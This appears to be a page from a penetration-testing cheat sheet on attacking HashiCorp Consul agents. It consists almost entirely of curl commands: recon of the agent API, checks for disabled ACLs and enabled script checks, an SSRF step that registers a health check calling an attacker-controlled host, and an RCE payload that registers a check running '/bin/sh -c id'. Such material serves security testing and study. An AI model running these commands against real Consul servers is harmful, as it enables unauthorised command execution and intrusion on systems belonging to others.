Consul

🙍‍♂️Consul by HashiCorp: from Infoleak to RCEWallarm

Recon

# Usefull info
curl http://ip:8500/v1/agent/self
curl http://ip:8500/v1/catalog/nodes
curl http://ip:8500/v1/agent/services
curl http://ip:8500/v1/kv/?keys

# Check if exploitable
curl ip:8500/v1/agent/self | jq | grep -i ACLsEnabled # false=no-auth
curl ip:8500/v1/agent/self | jq | grep -i script # EnableRemoteScriptChecks=true - add-check=RCE

Ssrf

Register agent

curl -X PUT -H "Content-Type: application/json" -d '{
  "ID": "testservice",
  "Name": "testservice",
  "Address": "127.0.0.1",
  "Port": 80,
  "check": {
    "HTTP": "http://attackerIp:attackerPort",
    "interval": "10s"
  }
}' http://consulHost:8500/v1/agent/service/register

Get output

curl http://consul-host:8500/v1/agent/checks | jq

Unregister agent

curl http://consul-host:8500/v1/agent/service/deregister/testservice -X PUT

Rce

curl -X PUT -H "Content-Type: application/json" -d '{
  "ID": "testservice",
  "Name": "testservice",
  "Address": "127.0.0.1",
  "Port": 80,
  "check": {
    "Args": ["/bin/sh", "-c", "id"],
    "interval": "10s"
  }
}' http://consul-host:8500/v1/agent/service/register

PreviousCLOUD & LINUX NextOpenstack

Last updated 12 days ago